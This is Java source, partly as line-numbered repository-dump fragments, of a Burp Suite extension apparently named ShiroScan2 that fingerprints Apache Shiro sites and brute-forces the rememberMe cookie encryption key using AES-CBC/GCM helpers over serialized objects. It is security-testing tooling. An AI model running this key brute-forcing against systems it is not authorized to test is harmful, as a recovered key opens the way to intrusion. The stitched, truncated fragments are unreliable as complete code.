 * runs it once, while the object is being constructed. {@link #run()} only
 * hands back the probe that was selected; it does not execute anything again.
 */
public class ShiroFingerprint {
    private IBurpExtenderCallbacks callbacks;

    private YamlReader yamlReader;

    private IHttpRequestResponse baseRequestResponse;

    // The probe chosen (and already executed) by setShiroFingerprint().
    private IShiroFingerprintExtension shiroFingerprint;

    /**
     * @param callbacks           Burp callback object handed to every probe
     * @param yamlReader          configuration reader handed to every probe
     * @param baseRequestResponse the observed request/response under test
     */
    public ShiroFingerprint(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
        this.callbacks = callbacks;
        this.yamlReader = yamlReader;
        this.baseRequestResponse = baseRequestResponse;
        this.shiroFingerprint = setShiroFingerprint();
    }

    /**
     * Tries the probes in a fixed order (3, then 2, then 1) and runs the first
     * one that reports itself as applicable. Probe 1 is the unconditional
     * fallback. Each probe is constructed only when the earlier one declined.
     */
    private IShiroFingerprintExtension setShiroFingerprint() {
        // Per the original author: used when the original request's cookie
        // keys already contain rememberMe.
        ShiroFingerprint3 requestCookieProbe =
                new ShiroFingerprint3(callbacks, yamlReader, baseRequestResponse);
        if (!requestCookieProbe.isRunExtension()) {
            // Per the original author: used when a cookie value in the
            // original response already contains deleteMe.
            ShiroFingerprint2 responseCookieProbe =
                    new ShiroFingerprint2(callbacks, yamlReader, baseRequestResponse);
            if (!responseCookieProbe.isRunExtension()) {
                // Neither condition held: fall back to the remaining probe.
                ShiroFingerprint1 fallbackProbe =
                        new ShiroFingerprint1(callbacks, yamlReader, baseRequestResponse);
                fallbackProbe.runExtension();
                return fallbackProbe;
            }
            responseCookieProbe.runExtension();
            return responseCookieProbe;
        }
        requestCookieProbe.runExtension();
        return requestCookieProbe;
    }

    /**
     * @return the probe selected in the constructor, with its result state
     */
    public IShiroFingerprintExtension run() {
        return shiroFingerprint;
    }
}
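/**
 * Read-only accessors for the URL components of one Burp request/response
 * pair.
 *
 * The value returned by {@link #getRequestDomainName()} is used by the scanner
 * as the per-site key when it counts scans and issues, so it has to identify
 * the origin (scheme, host, port) unambiguously.
 */
public class CustomBurpUrl {
    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;

    public PrintWriter stderr;

    private IHttpRequestResponse requestResponse;

    /**
     * @param callbacks       Burp callbacks; supplies the helpers and the error stream
     * @param requestResponse the message whose URL parts are exposed
     */
    public CustomBurpUrl(IBurpExtenderCallbacks callbacks, IHttpRequestResponse requestResponse) {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
        this.stderr = new PrintWriter(callbacks.getStderr(), true);

        this.requestResponse = requestResponse;
    }

    /** @return the wrapped request/response pair */
    public IHttpRequestResponse requestResponse() {
        return this.requestResponse;
    }

    /** @return the request protocol as reported by the HTTP service */
    public String getRequestProtocol() {
        return this.requestResponse.getHttpService().getProtocol();
    }

    /** @return the request host as reported by the HTTP service */
    public String getRequestHost() {
        return this.requestResponse.getHttpService().getHost();
    }

    /** @return the request port as reported by the HTTP service */
    public int getRequestPort() {
        return this.requestResponse.getHttpService().getPort();
    }

    /** @return the path component of the analysed request URL */
    public String getRequestPath() {
        return this.helpers.analyzeRequest(this.requestResponse).getUrl().getPath();
    }

    /** @return the query component of the analysed request URL, or null when there is none */
    public String getRequestQuery() {
        return this.helpers.analyzeRequest(this.requestResponse).getUrl().getQuery();
    }

    /**
     * Builds "protocol://host" and appends ":port" unless the port is the
     * default one for that protocol.
     *
     * The port is dropped only for http on 80 and https on 443. Dropping it
     * for any 80/443 regardless of scheme would turn, for example, plain http
     * on port 443 into "http://host", which names a different origin and would
     * merge two distinct sites under one key.
     *
     * @return the origin string used as the site identifier
     */
    public String getRequestDomainName() {
        String protocol = this.getRequestProtocol();
        int port = this.getRequestPort();
        String origin = protocol + "://" + this.getRequestHost();

        boolean isDefaultPort = ("http".equalsIgnoreCase(protocol) && port == 80)
                || ("https".equalsIgnoreCase(protocol) && port == 443);

        return isDefaultPort ? origin : origin + ":" + port;
    }

    /**
     * Reassembles the full request URL from origin, path and optional query.
     *
     * @return the URL, or null when the assembled string is not a valid URL
     *         (the stack trace is written to the extension's error stream).
     *         Callers that dereference the result directly must expect null.
     */
    public URL getHttpRequestUrl() {
        // Read the query once; each call re-analyses the request.
        String query = this.getRequestQuery();
        String spec = this.getRequestDomainName() + this.getRequestPath();
        if (query != null) {
            spec = spec + "?" + query;
        }

        try {
            return new URL(spec);
        } catch (MalformedURLException e) {
            e.printStackTrace(this.stderr);
        }
        return null;
    }
}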
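/**
 * Text-similarity helper used to compare two HTTP response pages.
 *
 * The filtering done here is a normalisation step for comparison only. It is
 * not an HTML sanitiser and its output must not be treated as safe to render.
 */
public class DiffPage {
    /**
     * Similarity of two pages after markup, scripts, styles, entities and
     * whitespace have been stripped from both.
     *
     * @param str    first page
     * @param target second page
     * @return a value in [0, 1]; 1 means the filtered texts are identical
     */
    public static double getRatio(String str, String target) {
        return getSimilarityRatio(getFilteredPageContent(str), getFilteredPageContent(target));
    }

    /**
     * Reduces a page to its visible text: entity-encoded markup is decoded
     * first, then script blocks, style blocks, remaining tags, leftover
     * entities and all whitespace are removed.
     *
     * Example: getFilteredPageContent("<html><title>foobar</title><body>test</body></html>")
     * returns "foobartest".
     *
     * @param htmlStr page content; null is treated as an empty page
     * @return the filtered text
     */
    public static String getFilteredPageContent(String htmlStr) {
        if (htmlStr == null) {
            return "";
        }

        // Decode the common entities so that entity-encoded tags are removed
        // by the tag filters below. "&amp;" goes last so that each entity is
        // decoded exactly once.
        htmlStr = htmlStr.replace("&lt;", "<");
        htmlStr = htmlStr.replace("&gt;", ">");
        htmlStr = htmlStr.replace("&quot;", "\"");
        htmlStr = htmlStr.replace("&nbsp;", " ");
        htmlStr = htmlStr.replace("&amp;", "&");

        // Script blocks including their body. Tag names are matched
        // case-insensitively because HTML tag names are.
        String scriptRegex = "(?i)<script[^>]*?>[\\s\\S]*?<\\/script>";
        // Style blocks including their body, so CSS does not dominate the text.
        String styleRegex = "(?i)<style[^>]*?>[\\s\\S]*?<\\/style>";
        // Any remaining tag; only the text between tags is kept.
        String htmlRegex = "<[^>]+>";
        // Named entities that were not decoded above.
        String specialRegex1 = "\\&[a-zA-Z]{1,10};";
        // Numeric entities.
        String specialRegex2 = "\\&#[a-zA-Z0-9]{1,10};";
        // Spaces, tabs, carriage returns and line feeds.
        String spaceRegex = "\\s+";

        htmlStr = htmlStr.replaceAll(scriptRegex, "");
        htmlStr = htmlStr.replaceAll(styleRegex, "");
        htmlStr = htmlStr.replaceAll(htmlRegex, "");
        htmlStr = htmlStr.replaceAll(specialRegex1, "");
        htmlStr = htmlStr.replaceAll(specialRegex2, "");
        htmlStr = htmlStr.replaceAll(spaceRegex, "");

        return htmlStr.trim();
    }

    /**
     * Edit-distance based similarity: 1 - distance / max(length).
     * ASCII letters are compared without regard to case.
     *
     * Only two rows of the distance matrix are kept, so memory grows with the
     * length of {@code target} rather than with the product of both lengths;
     * response bodies can be large.
     *
     * @param str    first string
     * @param target second string
     * @return 1 when the strings are equal, 0 when exactly one is empty,
     *         otherwise a value in [0, 1]
     */
    public static double getSimilarityRatio(String str, String target) {
        if (str.equals(target)) {
            return 1;
        }

        int n = str.length();
        int m = target.length();
        if (n == 0 || m == 0) {
            return 0;
        }

        int[] previous = new int[m + 1];
        int[] current = new int[m + 1];

        // Row 0: distance from the empty prefix of str to each prefix of target.
        for (int j = 0; j <= m; j++) {
            previous[j] = j;
        }

        for (int i = 1; i <= n; i++) {
            char ch1 = str.charAt(i - 1);
            current[0] = i;
            for (int j = 1; j <= m; j++) {
                int cost = sameIgnoringAsciiCase(ch1, target.charAt(j - 1)) ? 0 : 1;
                // Minimum of deletion, insertion and substitution.
                current[j] = Math.min(Math.min(previous[j] + 1, current[j - 1] + 1), previous[j - 1] + cost);
            }
            int[] swap = previous;
            previous = current;
            current = swap;
        }

        return 1 - (double) previous[m] / Math.max(n, m);
    }

    /**
     * True when both characters are equal once ASCII upper-case letters are
     * folded to lower case. A bare "differs by 32" test would also equate
     * unrelated characters such as '0' and 'P'.
     */
    private static boolean sameIgnoringAsciiCase(char a, char b) {
        if (a == b) {
            return true;
        }
        char foldedA = (a >= 'A' && a <= 'Z') ? (char) (a + 32) : a;
        char foldedB = (b >= 'A' && b <= 'Z') ? (char) (b + 32) : b;
        return foldedA == foldedB;
    }
}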
/**
 * AES-GCM implementation of {@link EncryptInterface}.
 *
 * Output layout of {@link #encrypt(String, byte[])}:
 * Base64( IV (16 bytes) || ciphertext with the 128-bit GCM tag appended ).
 *
 * NOTE(review): a 16-byte IV is longer than the 12 bytes usually recommended
 * for GCM; presumably it is chosen to match the format the tested framework
 * expects. Confirm before reusing this class for anything else.
 */
public class GcmEncrypt implements EncryptInterface {
    // Never assigned in this class, so ensureSecureRandom() always falls back
    // to getDefaultSecureRandom().
    private static SecureRandom secureRandom;

    // IV size in bits; divided by 8 when the IV buffer is allocated.
    private static int initializationVectorSize = 128;

    @Override
    public String getName() {
        return "gcm";
    }

    /**
     * Serialises an object with standard Java serialisation.
     *
     * @param obj the object to serialise
     * @return the serialised bytes
     * @throws IOException if serialisation fails
     */
    @Override
    public byte[] getBytes(Object obj) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        ObjectOutputStream serializer = new ObjectOutputStream(buffer);
        serializer.writeObject(obj);
        serializer.flush();
        return buffer.toByteArray();
    }

    /**
     * Encrypts the payload under the given Base64-encoded AES key.
     *
     * @param key     Base64-encoded AES key
     * @param payload bytes to encrypt; two marker bytes are appended first, see pad()
     * @return Base64 of IV followed by ciphertext and tag, or the literal "0"
     *         when anything fails (bad key, unavailable cipher, ...). The
     *         failure cause is not reported, so callers must treat "0" as an
     *         error value.
     */
    @Override
    public String encrypt(String key, byte[] payload) {
        try {
            byte[] keyBytes = Base64.decode(key);
            byte[] nonce = generateInitializationVector();
            SecretKeySpec aesKey = new SecretKeySpec(keyBytes, "AES");
            Cipher aesGcm = Cipher.getInstance("AES/GCM/NoPadding");
            // 128 is the authentication tag length in bits.
            aesGcm.init(Cipher.ENCRYPT_MODE, aesKey, new GCMParameterSpec(128, nonce));
            byte[] sealed = aesGcm.doFinal(pad(payload));
            return new String(Base64.encode(byteMerger(nonce, sealed)));
        } catch (Exception exception) {
            return "0";
        }
    }

    /**
     * Appends two bytes to the input: 0x00 followed by (16 - length % 16).
     * This is not block padding; the result is generally not a multiple of 16
     * bytes, which GCM does not require.
     */
    private static byte[] pad(byte[] s) {
        char marker = (char) (16 - s.length % 16);
        return byteMerger(s, charToByte(marker));
    }

    /** Splits a char into its high byte and low byte, in that order. */
    private static byte[] charToByte(char c) {
        return new byte[] {(byte) ((c & 0xFF00) >> 8), (byte) (c & 0xFF)};
    }

    /** Returns a new array holding bt1 followed by bt2. */
    private static byte[] byteMerger(byte[] bt1, byte[] bt2) {
        byte[] joined = new byte[bt1.length + bt2.length];
        System.arraycopy(bt1, 0, joined, 0, bt1.length);
        System.arraycopy(bt2, 0, joined, bt1.length, bt2.length);
        return joined;
    }

    /** Fills a fresh buffer of initializationVectorSize / 8 bytes with random data. */
    private static byte[] generateInitializationVector() {
        byte[] ivBytes = new byte[getInitializationVectorSize() / 8];
        ensureSecureRandom().nextBytes(ivBytes);
        return ivBytes;
    }

    /** Returns the shared generator when one is set, otherwise a default one. */
    private static SecureRandom ensureSecureRandom() {
        SecureRandom configured = getSecureRandom();
        return configured != null ? configured : getDefaultSecureRandom();
    }

    private static SecureRandom getSecureRandom() {
        return secureRandom;
    }

    /**
     * Requests the "SHA1PRNG" generator and falls back to the platform default
     * when that algorithm is not available.
     */
    private static SecureRandom getDefaultSecureRandom() {
        try {
            return SecureRandom.getInstance("SHA1PRNG");
        } catch (NoSuchAlgorithmException e) {
            return new SecureRandom();
        }
    }

    private static int getInitializationVectorSize() {
        return initializationVectorSize;
    }
}
delBooleanData(String key) { 39 | if (this.getBooleanMap().get(key) != null) { 40 | this.getBooleanMap().remove(key); 41 | } 42 | } 43 | 44 | public Map getShiroCipherKeyExtensioMap() { 45 | return this.shiroCipherKeyExtensioMap; 46 | } 47 | 48 | public IShiroCipherKeyExtension getShiroCipherKeyExtensionData(String key) { 49 | return this.getShiroCipherKeyExtensioMap().get(key); 50 | } 51 | 52 | public void putShiroCipherKeyExtensionData(String key, IShiroCipherKeyExtension b) { 53 | if (key == null || key.length() <= 0) { 54 | throw new IllegalArgumentException("key不能为空"); 55 | } 56 | 57 | synchronized (this.getShiroCipherKeyExtensioMap()) { 58 | this.getShiroCipherKeyExtensioMap().put(key, b); 59 | } 60 | } 61 | 62 | public void delShiroCipherKeyExtensionData(String key) { 63 | if (this.getShiroCipherKeyExtensioMap().get(key) != null) { 64 | this.getShiroCipherKeyExtensioMap().remove(key); 65 | } 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /src/main/java/burp/Bootstrap/GlobalVariableReader.java: -------------------------------------------------------------------------------- 1 | package burp.Bootstrap; 2 | 3 | import java.util.Map; 4 | import java.util.concurrent.ConcurrentHashMap; 5 | 6 | /** 7 | * 专门拿来做插件的全局变量共享的类 8 | */ 9 | public class GlobalVariableReader { 10 | private ConcurrentHashMap booleanMap; 11 | 12 | public GlobalVariableReader() { 13 | this.booleanMap = new ConcurrentHashMap(); 14 | } 15 | 16 | public Map getBooleanMap() { 17 | return this.booleanMap; 18 | } 19 | 20 | public Boolean getBooleanData(String key) { 21 | return this.getBooleanMap().get(key); 22 | } 23 | 24 | public void putBooleanData(String key, Boolean b) { 25 | if (key == null || key.length() <= 0) { 26 | throw new IllegalArgumentException("key不能为空"); 27 | } 28 | 29 | synchronized (this.getBooleanMap()) { 30 | this.getBooleanMap().put(key, b); 31 | } 32 | } 33 | 34 | public void delBooleanData(String key) { 35 | if 
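/**
 * Singleton reader for the extension's config.yml, which is loaded from the
 * "resources" directory next to the extension file.
 */
public class YamlReader {
    private static YamlReader instance;

    // Top-level mapping of the parsed configuration; never null.
    private static Map<String, Object> properties = new HashMap<>();

    /**
     * Parses resources/config.yml relative to the extension's directory.
     *
     * @throws FileNotFoundException when the configuration file is missing
     */
    private YamlReader(IBurpExtenderCallbacks callbacks) throws FileNotFoundException {
        CustomBurpHelpers customBurpHelpers = new CustomBurpHelpers(callbacks);
        File configFile = new File(customBurpHelpers.getExtensionFilePath() + "resources/config.yml");

        // NOTE(review): a default-constructed Yaml can, depending on the
        // SnakeYAML version on the classpath, instantiate arbitrary Java types
        // named by tags in the document. config.yml ships alongside the jar and
        // can be replaced by anyone able to write to that directory, so treat
        // it as untrusted input: restrict parsing to plain data (for example
        // SnakeYAML's SafeConstructor) and only use a config file from a
        // source you trust.
        Map<String, Object> loaded;
        FileInputStream in = new FileInputStream(configFile);
        try {
            loaded = new Yaml().load(in);
        } finally {
            // Release the file handle; the original never closed it.
            try {
                in.close();
            } catch (java.io.IOException ignored) {
                // The content has already been read (or the load failed and
                // that exception is the one that matters).
            }
        }

        // An empty file parses to null; keep lookups working on an empty map.
        properties = (loaded != null) ? loaded : new HashMap<String, Object>();
    }

    /**
     * Returns the shared reader, creating it on first use.
     *
     * @return the reader, or null when the configuration file was not found
     *         (the stack trace goes to the extension's error stream). Callers
     *         must be prepared for null.
     */
    public static synchronized YamlReader getInstance(IBurpExtenderCallbacks callbacks) {
        if (instance == null) {
            try {
                instance = new YamlReader(callbacks);
            } catch (FileNotFoundException e) {
                e.printStackTrace(new PrintWriter(callbacks.getStderr(), true));
            }
        }
        return instance;
    }

    /**
     * Looks up a value; nested mappings are addressed with a dotted path, for
     * example getValueByKey("a.b.c.d").
     *
     * @param key a plain key or a dotted path
     * @return the value, or null when any segment is missing or an
     *         intermediate value is not a mapping
     */
    public Object getValueByKey(String key) {
        if (!key.contains(".")) {
            return properties.get(key);
        }

        String[] segments = key.split("\\.");
        if (segments.length == 0) {
            // The key consisted of separators only.
            return null;
        }

        Object current = properties;
        for (String segment : segments) {
            if (!(current instanceof Map)) {
                return null;
            }
            current = ((Map<?, ?>) current).get(segment);
        }
        return current;
    }

    /**
     * @return the value rendered with String.valueOf; a missing key therefore
     *         yields the four-character string "null", not a null reference
     */
    public String getString(String key) {
        return String.valueOf(this.getValueByKey(key));
    }

    /** @return the value as a string, or defaultValue when the key is missing */
    public String getString(String key, String defaultValue) {
        Object value = this.getValueByKey(key);
        if (null == value) {
            return defaultValue;
        }
        return String.valueOf(value);
    }

    /** @return the boolean value; throws NullPointerException when the key is missing */
    public Boolean getBoolean(String key) {
        return (boolean) this.getValueByKey(key);
    }

    /** @return the integer value, or null when the key is missing */
    public Integer getInteger(String key) {
        return (Integer) this.getValueByKey(key);
    }

    /**
     * @return the numeric value as a double. Whole numbers in the file are
     *         parsed as integers, so the value is converted through Number
     *         instead of being cast to double directly. Throws
     *         NullPointerException when the key is missing.
     */
    public double getDouble(String key) {
        return ((Number) this.getValueByKey(key)).doubleValue();
    }

    /** @return the list stored under key, or null when the key is missing */
    @SuppressWarnings("unchecked")
    public List<String> getStringList(String key) {
        return (List<String>) this.getValueByKey(key);
    }

    /** @return the mapping stored under key, or null when the key is missing */
    public LinkedHashMap getLinkedHashMap(String key) {
        return (LinkedHashMap) this.getValueByKey(key);
    }
}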
9 | import burp.Ui.Tags; 10 | 11 | import burp.Bootstrap.YamlReader; 12 | import burp.Bootstrap.CustomBurpUrl; 13 | import burp.Bootstrap.GlobalVariableReader; 14 | import burp.Bootstrap.GlobalPassiveScanVariableReader; 15 | 16 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint; 17 | 18 | import burp.Application.ShiroCipherKeyExtension.ShiroCipherKeyThread; 19 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.IShiroCipherKeyExtension; 20 | 21 | public class BurpExtender implements IBurpExtender, IScannerCheck, IExtensionStateListener { 22 | public static String NAME = "ShiroScan2"; 23 | public static String VERSION = "2.0.0"; 24 | 25 | private GlobalVariableReader globalVariableReader; 26 | 27 | public static IBurpExtenderCallbacks callbacks; 28 | public static IExtensionHelpers helpers; 29 | 30 | private PrintWriter stdout; 31 | private PrintWriter stderr; 32 | 33 | private Tags tags; 34 | 35 | private YamlReader yamlReader; 36 | 37 | @Override 38 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { 39 | this.callbacks = callbacks; 40 | this.helpers = callbacks.getHelpers(); 41 | 42 | this.stdout = new PrintWriter(callbacks.getStdout(), true); 43 | this.stderr = new PrintWriter(callbacks.getStderr(), true); 44 | 45 | // 全局变量的数据保存地址 46 | // 用于在程序执行的过程中能够实时的修改变量数据使用 47 | this.globalVariableReader = new GlobalVariableReader(); 48 | 49 | // 是否卸载扩展 50 | // 用于卸载插件以后,把程序快速退出去,避免卡顿 51 | // true = 已被卸载, false = 未卸载 52 | this.globalVariableReader.putBooleanData("isExtensionUnload", false); 53 | 54 | // 标签界面 55 | this.tags = new Tags(callbacks, NAME); 56 | 57 | // 配置文件 58 | this.yamlReader = YamlReader.getInstance(callbacks); 59 | 60 | callbacks.setExtensionName(NAME); 61 | callbacks.registerScannerCheck(this); 62 | callbacks.registerContextMenuFactory(new Menu()); 63 | callbacks.registerExtensionStateListener(this); 64 | 65 | // 基本信息输出 66 | // 作者拿来臭美用的 ╰(*°▽°*)╯ 67 | this.stdout.println(basicInformationOutput()); 
68 | } 69 | 70 | /** 71 | * 基本信息输出 72 | */ 73 | private static String basicInformationOutput() { 74 | String str1 = "===================================\n"; 75 | String str2 = String.format("%s Load the success\n", NAME); 76 | String str3 = String.format("VERSION: %s\n", VERSION); 77 | String str4 = "author: pmiaowu\n"; 78 | String str5 = "QQ: 3303003493\n"; 79 | String str6 = "WeChat: a3303003493\n"; 80 | String str7 = "GitHub: https://github.com/pmiaowu\n"; 81 | String str8 = "Blog: https://www.yuque.com/pmiaowu\n"; 82 | String str9 = String.format("downloadLink: %s\n", "https://github.com/pmiaowu/BurpShiroPassiveScan"); 83 | String str10 = "===================================\n"; 84 | String detail = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10; 85 | return detail; 86 | } 87 | 88 | @Override 89 | public List doPassiveScan(IHttpRequestResponse baseRequestResponse) { 90 | // 被动扫描器变量共享的数据保存地址 91 | // 用于在程序执行的过程中能够实时的修改变量数据使用 92 | GlobalPassiveScanVariableReader globalPassiveScanVariableReader = new GlobalPassiveScanVariableReader(); 93 | 94 | List issues = new ArrayList<>(); 95 | 96 | List domainNameBlacklist = this.yamlReader.getStringList("scan.domainName.blacklist"); 97 | List domainNameWhitelist = this.yamlReader.getStringList("scan.domainName.whitelist"); 98 | 99 | // 基础url解析 100 | CustomBurpUrl baseBurpUrl = new CustomBurpUrl(this.callbacks, baseRequestResponse); 101 | 102 | // 消息等级-用于插件扫描队列界面的显示 103 | String messageLevel = this.yamlReader.getString("messageLevel"); 104 | 105 | // 判断是否开启插件 106 | if (!this.tags.getBaseSettingTagClass().isStart()) { 107 | return null; 108 | } 109 | 110 | // 判断域名黑名单 111 | if (domainNameBlacklist != null && domainNameBlacklist.size() >= 1) { 112 | if (isMatchDomainName(baseBurpUrl.getRequestHost(), domainNameBlacklist)) { 113 | return null; 114 | } 115 | } 116 | 117 | // 判断域名白名单 118 | if (domainNameWhitelist != null && domainNameWhitelist.size() >= 1) { 119 | if 
(!isMatchDomainName(baseBurpUrl.getRequestHost(), domainNameWhitelist)) { 120 | return null; 121 | } 122 | } 123 | 124 | // 判断当前请求后缀,是否为url黑名单后缀 125 | if (this.isUrlBlackListSuffix(baseBurpUrl)) { 126 | return null; 127 | } 128 | 129 | // 判断当前站点是否超出扫描数量了 130 | Integer siteScanNumber = this.yamlReader.getInteger("scan.siteScanNumber"); 131 | if (siteScanNumber != 0) { 132 | Integer siteNumber = this.getSiteNumber(baseBurpUrl.getRequestDomainName()); 133 | if (siteNumber >= siteScanNumber) { 134 | if (messageLevel.equals("ALL")) { 135 | this.tags.getScanQueueTagClass().add( 136 | "", 137 | "", 138 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 139 | baseBurpUrl.getHttpRequestUrl().toString(), 140 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 141 | "the number of website scans exceeded", 142 | baseRequestResponse 143 | ); 144 | } 145 | return null; 146 | } 147 | } 148 | 149 | // 判断当前站点的shiro指纹问题数量是否超出了 150 | Integer shiroFingerprintScanIssueNumber = this.yamlReader.getInteger("application.shiroFingerprintExtension.config.issueNumber"); 151 | if (shiroFingerprintScanIssueNumber != 0) { 152 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName"); 153 | Integer shiroFingerprintIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroFingerprintIssueName); 154 | if (shiroFingerprintIssueNumber >= shiroFingerprintScanIssueNumber) { 155 | if (messageLevel.equals("ALL")) { 156 | this.tags.getScanQueueTagClass().add( 157 | "", 158 | "", 159 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 160 | baseBurpUrl.getHttpRequestUrl().toString(), 161 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 162 | "shiro fingerprint problems have exceeded the number", 163 | baseRequestResponse 164 | ); 165 | } 166 | return null; 167 | } 168 | } 169 | 170 | // 判断当前站点的shiro加密key问题数量是否超出了 171 | 
Integer shiroCipherKeyScanIssueNumber = this.yamlReader.getInteger("application.shiroCipherKeyExtension.config.issueNumber"); 172 | if (shiroCipherKeyScanIssueNumber != 0) { 173 | String shiroCipherKeyIssueName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.issueName"); 174 | Integer shiroCipherKeyIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroCipherKeyIssueName); 175 | if (shiroCipherKeyIssueNumber >= shiroCipherKeyScanIssueNumber) { 176 | if (messageLevel.equals("ALL")) { 177 | this.tags.getScanQueueTagClass().add( 178 | "", 179 | "", 180 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 181 | baseBurpUrl.getHttpRequestUrl().toString(), 182 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 183 | "shiro encryption key leakage problems have exceeded the number", 184 | baseRequestResponse 185 | ); 186 | } 187 | return null; 188 | } 189 | } 190 | 191 | // shiro指纹探测扩展 192 | ShiroFingerprint shiroFingerprint = new ShiroFingerprint(this.callbacks, this.yamlReader, baseRequestResponse); 193 | 194 | // 判断指纹模块是否正常 195 | if (!shiroFingerprint.run().isRunExtension()) { 196 | this.tags.getScanQueueTagClass().add( 197 | "", 198 | "", 199 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 200 | baseBurpUrl.getHttpRequestUrl().toString(), 201 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 202 | "shiro fingerprint module startup error", 203 | baseRequestResponse 204 | ); 205 | return null; 206 | } 207 | 208 | // 检测是否shiro框架 209 | if (!shiroFingerprint.run().isShiroFingerprint()) { 210 | if (messageLevel.equals("ALL")) { 211 | this.tags.getScanQueueTagClass().add( 212 | "", 213 | "", 214 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 215 | baseBurpUrl.getHttpRequestUrl().toString(), 216 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 217 | "the site is not a shiro 
framework", 218 | baseRequestResponse 219 | ); 220 | } 221 | return null; 222 | } 223 | 224 | // shiro指纹检测-控制台报告输出 225 | shiroFingerprint.run().consoleExport(); 226 | 227 | // shiro指纹检测-报告输出 228 | issues.add(shiroFingerprint.run().export()); 229 | 230 | // 添加任务到面板中等待检测 231 | int tagId = this.tags.getScanQueueTagClass().add( 232 | "", 233 | "", 234 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 235 | baseBurpUrl.getHttpRequestUrl().toString(), 236 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 237 | "waiting for test results", 238 | baseRequestResponse 239 | ); 240 | 241 | try { 242 | // shiro加密key扩展 243 | Boolean isStartShiroCipherKeyExtension = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isStart"); 244 | Boolean isScanCbcEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanCbcEncrypt"); 245 | Boolean isScanGcmEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanGcmEncrypt"); 246 | if (isStartShiroCipherKeyExtension && (isScanCbcEncrypt || isScanGcmEncrypt)) { 247 | // 启动线程跑shiro加密key扩展任务 248 | String callClassName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.provider"); 249 | ShiroCipherKeyThread shiroCipherKeyThread = new ShiroCipherKeyThread( 250 | this.globalVariableReader, 251 | globalPassiveScanVariableReader, 252 | this.callbacks, 253 | this.yamlReader, 254 | baseRequestResponse, 255 | shiroFingerprint, 256 | callClassName); 257 | 258 | // 监控线程 259 | while (true) { 260 | if (shiroCipherKeyThread.isTaskComplete()) { 261 | break; 262 | } 263 | 264 | // 单纯的等待~ 265 | Thread.sleep(500); 266 | } 267 | 268 | // 尝试获取shiro加密key扩展的数据 269 | // 注意: 只有成功爆破出shiro加密key了才会有数据 270 | IShiroCipherKeyExtension shiroCipherKey = globalPassiveScanVariableReader.getShiroCipherKeyExtensionData("shiroCipherKey"); 271 | 272 | // 为空的时候,表示没有成功爆破出shiro加密key 273 | if (shiroCipherKey == null) { 274 | // 
未检查出来key-更新任务状态至任务栏面板 275 | this.tags.getScanQueueTagClass().save( 276 | tagId, 277 | "", 278 | "", 279 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 280 | baseBurpUrl.getHttpRequestUrl().toString(), 281 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 282 | "[-] not found shiro key", 283 | baseRequestResponse); 284 | return issues; 285 | } 286 | 287 | // 检查出来key-更新任务状态至任务栏面板 288 | IHttpRequestResponse shiroCipherKeyRequestResponse = shiroCipherKey.getHttpRequestResponse(); 289 | this.tags.getScanQueueTagClass().save( 290 | tagId, 291 | shiroCipherKey.getExtensionName(), 292 | shiroCipherKey.getEncryptMethod(), 293 | this.helpers.analyzeRequest(shiroCipherKeyRequestResponse).getMethod(), 294 | baseBurpUrl.getHttpRequestUrl().toString(), 295 | this.helpers.analyzeResponse(shiroCipherKeyRequestResponse.getResponse()).getStatusCode() + "", 296 | "[+] found shiro key:" + shiroCipherKey.getCipherKey(), 297 | shiroCipherKeyRequestResponse); 298 | 299 | // shiro加密key-控制台报告输出 300 | shiroCipherKey.consoleExport(); 301 | 302 | // shiro加密key-报告输出 303 | issues.add(shiroCipherKey.export()); 304 | } else { 305 | this.tags.getScanQueueTagClass().save( 306 | tagId, 307 | "", 308 | "", 309 | this.helpers.analyzeRequest(shiroFingerprint.run().getHttpRequestResponse()).getMethod(), 310 | baseBurpUrl.getHttpRequestUrl().toString(), 311 | this.helpers.analyzeResponse(shiroFingerprint.run().getHttpRequestResponse().getResponse()).getStatusCode() + "", 312 | "[*] shiro fingerprint", 313 | shiroFingerprint.run().getHttpRequestResponse()); 314 | } 315 | 316 | URL httpRequestUrl = baseBurpUrl.getHttpRequestUrl(); 317 | this.stdout.println("============shiro-key扫描完毕================"); 318 | this.stdout.println(String.format("url: %s", httpRequestUrl)); 319 | this.stdout.println("========================================"); 320 | } catch (Exception e) { 321 | // 判断是否有shiro指纹,输出到问题面板过 322 | // 如果有,那么爆致命错误的时候就可以删除issues变量的数据 323 | // 
